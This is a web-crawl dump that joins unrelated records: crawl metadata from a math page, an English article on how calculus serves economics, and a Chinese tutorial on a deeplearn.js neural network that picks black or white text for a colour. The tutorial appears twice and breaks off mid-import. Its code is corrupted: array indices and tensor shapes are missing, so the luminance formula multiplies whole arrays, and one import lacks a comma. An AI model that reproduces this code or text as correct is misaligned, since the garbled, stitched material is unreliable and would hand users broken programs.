Service; 2004 - )." ]
[ null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1a8.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1a9.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1aa.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/GrtPyramid2crop.jpg", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1ab.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1ac.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1ad.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1ae.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1af.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1b0.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1b1.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1b2.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9201663,"math_prob":0.9768514,"size":3407,"snap":"2019-13-2019-22","text_gpt3_token_len":935,"char_repetition_ratio":0.12518366,"word_repetition_ratio":0.029850746,"special_character_ratio":0.28324038,"punctuation_ratio":0.11251758,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99285644,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-19T02:23:46Z\",\"WARC-Record-ID\":\"<urn:uuid:30f45900-ea88-4bf8-aebd-ea66cebf3270>\",\"Content-Length\":\"8064\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e377fa93-3b63-4ed4-9ece-769c5066d132>\",\"WARC-Concurrent-To\":\"<urn:uuid:1587697a-61c7-4f04-bc07-770d2a60492a>\",\"WARC-IP-Address\":\"208.81.176.91\",\"WARC-Target-URI\":\"http://www.the-mathroom.ca/plgm/plgm2.2/plgm2.2.htm\",\"WARC-Payload-Digest\":\"sha1:4ZBHE6HKYRIXAZPV6X2HWLK4BNXQWBB7\",\"WARC-Block-Digest\":\"sha1:ZEXNEBEM3IKNXLLCYPREUW7EOJAFANZ4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912201882.11_warc_CC-MAIN-20190319012213-20190319034213-00521.warc.gz\"}"}
https://sciencing.com/how-is-calculus-used-in-economics-13593453.html
[ "# How is Calculus Used in Economics?\n\n••• calculatrice image by Danielle Bonardelle from Fotolia.com\nPrint\n\nAlthough introductory economics courses, such as those most college students must complete in the course of their studies, involve little math, an in-depth study of economics requires a rigorous understanding of mathematics, including calculus. Calculus provides the language of economics and the means by which economists solve problems. Calculus is especially significant in illustrating what a leading economist calls a key principle of economics.\n\n## Identification\n\nAs an advanced branch of mathematics, calculus focuses heavily on functions and derivatives. Functions examine the relationship between two or more variables, or entities that take on different values. Mathematicians and economists often use letters, such as X and Y, to symbolize particular variables. If the value of Y changes as the value of X changes, then the two variables have a functional relationship. Derivatives, meanwhile, consider the rate of change in one variable relative to the change in another. Functions and derivatives relate to relevant concepts in economics.\n\n## Function\n\nEconomic research often uses calculus to examine functional relationships. An example includes the relationship between the dependent variable income and various predictors, or independent variables, such as education and experience. If average income rises as years of education and work experience increase, then a positive relationship exists between the variables, namely that income is a function of education and experience. Differential calculus, the process of obtaining derivatives, enables economists to measure the average change in income relative to a single year’s increase in education and/or experience.\n\n## Effects\n\nDerivatives in calculus, or the change in one variable relative to the change in another, are identical to the economic concepts of marginalism, which examines the change in an outcome that results from a single-unit increase in another variable. Marginal changes relate to an important principle in economics: the notion that people tend to think at the margin, according to Harvard economist Greg Mankiw, author of “Principles of Economics,” a popular textbook in college economics courses. Mankiw writes that economists use the term \"marginal changes\" to describe small, incremental changes, such as incremental changes in work hours or factory output.\n\n## Benefits\n\nCalculus, by determining marginal revenues and costs, can help business managers maximize their profits and measure the rate of increase in profit that results from each increase in production. As long as marginal revenue exceeds marginal cost, the firm increases its profits.\n\n## Significance\n\nThe amount of interest to be paid on a loan, whether for a home, motor vehicle or capital equipment for a business, is an important consideration for households and firms. Calculus provides a means for determining the amount of interest paid over the life of a loan." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92461306,"math_prob":0.8700707,"size":3115,"snap":"2020-45-2020-50","text_gpt3_token_len":576,"char_repetition_ratio":0.13661203,"word_repetition_ratio":0.02183406,"special_character_ratio":0.17303371,"punctuation_ratio":0.11111111,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9712559,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-24T13:06:21Z\",\"WARC-Record-ID\":\"<urn:uuid:84dc0610-0713-49af-9834-5ea9383a8285>\",\"Content-Length\":\"387564\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2cff2cca-ef6e-40ec-95d4-64df62a81783>\",\"WARC-Concurrent-To\":\"<urn:uuid:cec87101-b96e-4da0-9e25-9cd7d7c1440e>\",\"WARC-IP-Address\":\"96.6.42.16\",\"WARC-Target-URI\":\"https://sciencing.com/how-is-calculus-used-in-economics-13593453.html\",\"WARC-Payload-Digest\":\"sha1:2LYKSQQ2PSZR3GIER43PJUKGOEUZKPOR\",\"WARC-Block-Digest\":\"sha1:XRMDMODGKGM7525WVR7A53QB4QIIVEWL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141176256.21_warc_CC-MAIN-20201124111924-20201124141924-00357.warc.gz\"}"}
https://www.juhe.cn/news/index/id/2461
[ "API接口,开发服务,免费咨询服务\n\n# 听说你用JavaScript写代码?本文是你的机器学习指南\n\nJavaScript 是一种流行的高级编程语言,它被世界上的绝大多数网站所使用,也被所有主流浏览器所支持。随着深度学习的火热,越来越多开发者开始探索使用 JavaScript 实现人工智能与机器学习算法。近日,来自德国的 Robin Wieruch 发布了一系列使用 JavaScript 构建机器学习的教程,本文将主要介绍使用 JavaScript 实现神经网络的方法。\n\n### 神经网络的目的是什么?\n\n``````function getAccessibleColor(rgb) {\nlet [ r, g, b ] = rgb;\nlet colors = [r / 255, g / 255, b / 255];\nlet c = colors.map((col) => {\nif (col <= 0.03928) {\nreturn col / 12.92;\n}\nreturn Math.pow((col + 0.055) / 1.055, 2.4);\n});\nlet L = (0.2126 * c) + (0.7152 * c) + (0.0722 * c);\nreturn (L > 0.179)\n? [ 0, 0, 0 ]\n: [ 255, 255, 255 ];\n}``````\n\n### JavaScript 中的数据集生成\n\n``````function generateRandomRgbColors(m) {\nconst rawInputs = [];\nfor (let i = 0; i < m; i++) {\nrawInputs.push(generateRandomRgbColor());\n}\nreturn rawInputs;\n}\nfunction generateRandomRgbColor() {\nreturn [\nrandomIntFromInterval(0, 255),\nrandomIntFromInterval(0, 255),\nrandomIntFromInterval(0, 255),\n];\n}\nfunction randomIntFromInterval(min, max) {\nreturn Math.floor(Math.random() * (max - min + 1) + min);\n}``````\n\ngenerateRandomRgbColors() 函数创建给定大小为 m 的部分数据集。数据集中的数据点是 RGB 颜色空间中的颜色。每种颜色在矩阵中被表征为一行,而每一列是颜色的特征。特征是 RGB 空间中的 R、G、B 编码值。数据集还没有任何标签,所以训练集并不完整,因为它只有输入值而没有输出值。\n\n``````function getAccessibleColor(rgb) {\nlet [ r, g, b ] = rgb;\nlet color = [r / 255, g / 255, b / 255];\nlet c = color.map((col) => {\nif (col <= 0.03928) {\nreturn col / 12.92;\n}\nreturn Math.pow((col + 0.055) / 1.055, 2.4);\n});\nlet L = (0.2126 * c) + (0.7152 * c) + (0.0722 * c);\nreturn (L > 0.179)\n? [ 0, 1 ] // black\n: [ 1, 0 ]; // white\n}\n``````\n\n``````function generateColorSet(m) {\nconst rawInputs = generateRandomRgbColors(m);\nconst rawTargets = rawInputs.map(getAccessibleColor);\nreturn { rawInputs, rawTargets };\n}``````\n\n``````function normalizeColor(rgb) {\nreturn rgb.map(v => v / 255);\n}``````\n\n### JavaScript 神经网络模型的设置阶段\n\n• 首先,它使用本地电脑的 GPU 加速机器学习算法中的向量计算。这些机器学习计算与图解计算类似,因此使用 GPU 的计算比使用 CPU 更加高效。\n• 其次,deeplearn.js 的结构与流行的 TensorFlow 库类似(TensorFlow 库也是谷歌开发的,不过它使用的是 Python 语言)。因此如果你想在使用 Python 的机器学习中实现飞跃,那么 deeplearn.js 可提供通向 JavaScript 各领域的捷径。\n\n``npm install deeplearn``\n\n``````class ColorAccessibilityModel {\nnormalizeColor(rgb) {\nreturn rgb.map(v => v / 255);\n}\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nGraph,\nNDArrayMathGPU,\n} from 'deeplearn';\nclass ColorAccessibilityModel {\nsetupSession(trainingSet) {\nconst graph = new Graph();\n}\n..\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\n}\ncreateConnectedLayer(\ngraph,\ninputLayer,\nlayerIndex,\nunits,\n) {\n...\n}\n...\n}\nexport default ColorAccessibilityModel;\n``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\n}\ncreateConnectedLayer(\ngraph,\ninputLayer,\nlayerIndex,\nunits,\n) {\nreturn graph.layers.dense(\n`fully_connected_\\${layerIndex}`,\ninputLayer,\nunits\n);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\n}\ncreateConnectedLayer(\ngraph,\ninputLayer,\nlayerIndex,\nunits,\nactivationFunction\n) {\nreturn graph.layers.dense(\n`fully_connected_\\${layerIndex}`,\ninputLayer,\nunits,\nactivationFunction ? activationFunction : (x) => graph.relu(x)\n);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\npredictionTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\nthis.predictionTensor = this.createConnectedLayer(graph, connectedLayer, 3, 2);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\nthis.predictionTensor = this.createConnectedLayer(graph, connectedLayer, 3, 2);\nthis.costTensor = graph.meanSquaredCost(this.targetTensor, this.predictionTensor);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\nthis.predictionTensor = this.createConnectedLayer(graph, connectedLayer, 3, 2);\nthis.costTensor = graph.meanSquaredCost(this.targetTensor, this.predictionTensor);\nthis.session = new Session(graph, math);\nthis.prepareTrainingSet(trainingSet);\n}\nprepareTrainingSet(trainingSet) {\n...\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\n...\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\nconst { rawInputs, rawTargets } = trainingSet;\nconst inputArray = rawInputs.map(v => Array1D.new(this.normalizeColor(v)));\nconst targetArray = rawTargets.map(v => Array1D.new(v));\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder,\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\nconst { rawInputs, rawTargets } = trainingSet;\nconst inputArray = rawInputs.map(v => Array1D.new(this.normalizeColor(v)));\nconst targetArray = rawTargets.map(v => Array1D.new(v));\nconst shuffledInputProviderBuilder = new InCPUMemoryShuffledInputProviderBuilder([\ninputArray,\ntargetArray\n]);\nconst [\ninputProvider,\ntargetProvider,\n] = shuffledInputProviderBuilder.getInputProviders();\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nfeedEntries;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\nconst { rawInputs, rawTargets } = trainingSet;\nconst inputArray = rawInputs.map(v => Array1D.new(this.normalizeColor(v)));\nconst targetArray = rawTargets.map(v => Array1D.new(v));\nconst shuffledInputProviderBuilder = new InCPUMemoryShuffledInputProviderBuilder([\ninputArray,\ntargetArray\n]);\nconst [\ninputProvider,\ntargetProvider,\n] = shuffledInputProviderBuilder.getInputProviders();\nthis.feedEntries = [\n{ tensor: this.inputTensor, data: inputProvider },\n{ tensor: this.targetTensor, data: targetProvider },\n];\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder,\nGraph,\nSession,\nSGDOptimizer,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\noptimizer;\nbatchSize = 300;\ninitialLearningRate = 0.06;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nfeedEntries;\nconstructor() {\nthis.optimizer = new SGDOptimizer(this.initialLearningRate);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n### 训练阶段\n\n``````class ColorAccessibilityModel {\n...\ntrain() {\nmath.scope(() => {\nthis.session.train(\nthis.costTensor,\nthis.feedEntries,\nthis.batchSize,\nthis.optimizer\n);\n});\n}\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\n...\ntrain(step) {\nlet learningRate = this.initialLearningRate * Math.pow(0.90, Math.floor(step / 50));\nthis.optimizer.setLearningRate(learningRate);\nmath.scope(() => {\nthis.session.train(\nthis.costTensor,\nthis.feedEntries,\nthis.batchSize,\nthis.optimizer\n);\n}\n}\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder,\nGraph,\nSession,\nSGDOptimizer,\nNDArrayMathGPU,\nCostReduction,\n} from 'deeplearn';\nclass ColorAccessibilityModel {\n...\ntrain(step, computeCost) {\nlet learningRate = this.initialLearningRate * Math.pow(0.90, Math.floor(step / 50));\nthis.optimizer.setLearningRate(learningRate);\nlet costValue;\nmath.scope(() => {\nconst cost = this.session.train(\nthis.costTensor,\nthis.feedEntries,\nthis.batchSize,\nthis.optimizer,\ncomputeCost ? CostReduction.MEAN : CostReduction.NONE,\n);\nif (computeCost) {\ncostValue = cost.get();\n}\n});\nreturn costValue;\n}\n}\nexport default ColorAccessibilityModel;``````\n\n### 推断阶段\n\n``````class ColorAccessibilityModel {\n...\npredict(rgb) {\nlet classifier = [];\nmath.scope(() => {\nconst mapping = [{\ntensor: this.inputTensor,\ndata: Array1D.new(this.normalizeColor(rgb)),\n}];\nclassifier = this.session.eval(this.predictionTensor, mapping).getValues();\n});\nreturn [ ...classifier ];\n}\n}\nexport default ColorAccessibilityModel;``````\n\n### 在 JavaScript 中可视化学习神经网络\n\n#### 标签/Tag\n\nAPI接口,开发服务,免费咨询服务\n\nJavaScript 是一种流行的高级编程语言,它被世界上的绝大多数网站所使用,也被所有主流浏览器所支持。随着深度学习的火热,越来越多开发者开始探索使用 JavaScript 实现人工智能与机器学习算法。近日,来自德国的 Robin Wieruch 发布了一系列使用 JavaScript 构建机器学习的教程,本文将主要介绍使用 JavaScript 实现神经网络的方法。\n\n### 神经网络的目的是什么?\n\n``````function getAccessibleColor(rgb) {\nlet [ r, g, b ] = rgb;\nlet colors = [r / 255, g / 255, b / 255];\nlet c = colors.map((col) => {\nif (col <= 0.03928) {\nreturn col / 12.92;\n}\nreturn Math.pow((col + 0.055) / 1.055, 2.4);\n});\nlet L = (0.2126 * c) + (0.7152 * c) + (0.0722 * c);\nreturn (L > 0.179)\n? [ 0, 0, 0 ]\n: [ 255, 255, 255 ];\n}``````\n\n### JavaScript 中的数据集生成\n\n``````function generateRandomRgbColors(m) {\nconst rawInputs = [];\nfor (let i = 0; i < m; i++) {\nrawInputs.push(generateRandomRgbColor());\n}\nreturn rawInputs;\n}\nfunction generateRandomRgbColor() {\nreturn [\nrandomIntFromInterval(0, 255),\nrandomIntFromInterval(0, 255),\nrandomIntFromInterval(0, 255),\n];\n}\nfunction randomIntFromInterval(min, max) {\nreturn Math.floor(Math.random() * (max - min + 1) + min);\n}``````\n\ngenerateRandomRgbColors() 函数创建给定大小为 m 的部分数据集。数据集中的数据点是 RGB 颜色空间中的颜色。每种颜色在矩阵中被表征为一行,而每一列是颜色的特征。特征是 RGB 空间中的 R、G、B 编码值。数据集还没有任何标签,所以训练集并不完整,因为它只有输入值而没有输出值。\n\n``````function getAccessibleColor(rgb) {\nlet [ r, g, b ] = rgb;\nlet color = [r / 255, g / 255, b / 255];\nlet c = color.map((col) => {\nif (col <= 0.03928) {\nreturn col / 12.92;\n}\nreturn Math.pow((col + 0.055) / 1.055, 2.4);\n});\nlet L = (0.2126 * c) + (0.7152 * c) + (0.0722 * c);\nreturn (L > 0.179)\n? [ 0, 1 ] // black\n: [ 1, 0 ]; // white\n}\n``````\n\n``````function generateColorSet(m) {\nconst rawInputs = generateRandomRgbColors(m);\nconst rawTargets = rawInputs.map(getAccessibleColor);\nreturn { rawInputs, rawTargets };\n}``````\n\n``````function normalizeColor(rgb) {\nreturn rgb.map(v => v / 255);\n}``````\n\n### JavaScript 神经网络模型的设置阶段\n\n• 首先,它使用本地电脑的 GPU 加速机器学习算法中的向量计算。这些机器学习计算与图解计算类似,因此使用 GPU 的计算比使用 CPU 更加高效。\n• 其次,deeplearn.js 的结构与流行的 TensorFlow 库类似(TensorFlow 库也是谷歌开发的,不过它使用的是 Python 语言)。因此如果你想在使用 Python 的机器学习中实现飞跃,那么 deeplearn.js 可提供通向 JavaScript 各领域的捷径。\n\n``npm install deeplearn``\n\n``````class ColorAccessibilityModel {\nnormalizeColor(rgb) {\nreturn rgb.map(v => v / 255);\n}\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nGraph,\nNDArrayMathGPU,\n} from 'deeplearn';\nclass ColorAccessibilityModel {\nsetupSession(trainingSet) {\nconst graph = new Graph();\n}\n..\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\n}\ncreateConnectedLayer(\ngraph,\ninputLayer,\nlayerIndex,\nunits,\n) {\n...\n}\n...\n}\nexport default ColorAccessibilityModel;\n``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\n}\ncreateConnectedLayer(\ngraph,\ninputLayer,\nlayerIndex,\nunits,\n) {\nreturn graph.layers.dense(\n`fully_connected_\\${layerIndex}`,\ninputLayer,\nunits\n);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\n}\ncreateConnectedLayer(\ngraph,\ninputLayer,\nlayerIndex,\nunits,\nactivationFunction\n) {\nreturn graph.layers.dense(\n`fully_connected_\\${layerIndex}`,\ninputLayer,\nunits,\nactivationFunction ? activationFunction : (x) => graph.relu(x)\n);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\npredictionTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\nthis.predictionTensor = this.createConnectedLayer(graph, connectedLayer, 3, 2);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\nthis.predictionTensor = this.createConnectedLayer(graph, connectedLayer, 3, 2);\nthis.costTensor = graph.meanSquaredCost(this.targetTensor, this.predictionTensor);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\nthis.predictionTensor = this.createConnectedLayer(graph, connectedLayer, 3, 2);\nthis.costTensor = graph.meanSquaredCost(this.targetTensor, this.predictionTensor);\nthis.session = new Session(graph, math);\nthis.prepareTrainingSet(trainingSet);\n}\nprepareTrainingSet(trainingSet) {\n...\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\n...\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\nconst { rawInputs, rawTargets } = trainingSet;\nconst inputArray = rawInputs.map(v => Array1D.new(this.normalizeColor(v)));\nconst targetArray = rawTargets.map(v => Array1D.new(v));\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder,\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\nconst { rawInputs, rawTargets } = trainingSet;\nconst inputArray = rawInputs.map(v => Array1D.new(this.normalizeColor(v)));\nconst targetArray = rawTargets.map(v => Array1D.new(v));\nconst shuffledInputProviderBuilder = new InCPUMemoryShuffledInputProviderBuilder([\ninputArray,\ntargetArray\n]);\nconst [\ninputProvider,\ntargetProvider,\n] = shuffledInputProviderBuilder.getInputProviders();\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nfeedEntries;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\nconst { rawInputs, rawTargets } = trainingSet;\nconst inputArray = rawInputs.map(v => Array1D.new(this.normalizeColor(v)));\nconst targetArray = rawTargets.map(v => Array1D.new(v));\nconst shuffledInputProviderBuilder = new InCPUMemoryShuffledInputProviderBuilder([\ninputArray,\ntargetArray\n]);\nconst [\ninputProvider,\ntargetProvider,\n] = shuffledInputProviderBuilder.getInputProviders();\nthis.feedEntries = [\n{ tensor: this.inputTensor, data: inputProvider },\n{ tensor: this.targetTensor, data: targetProvider },\n];\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import 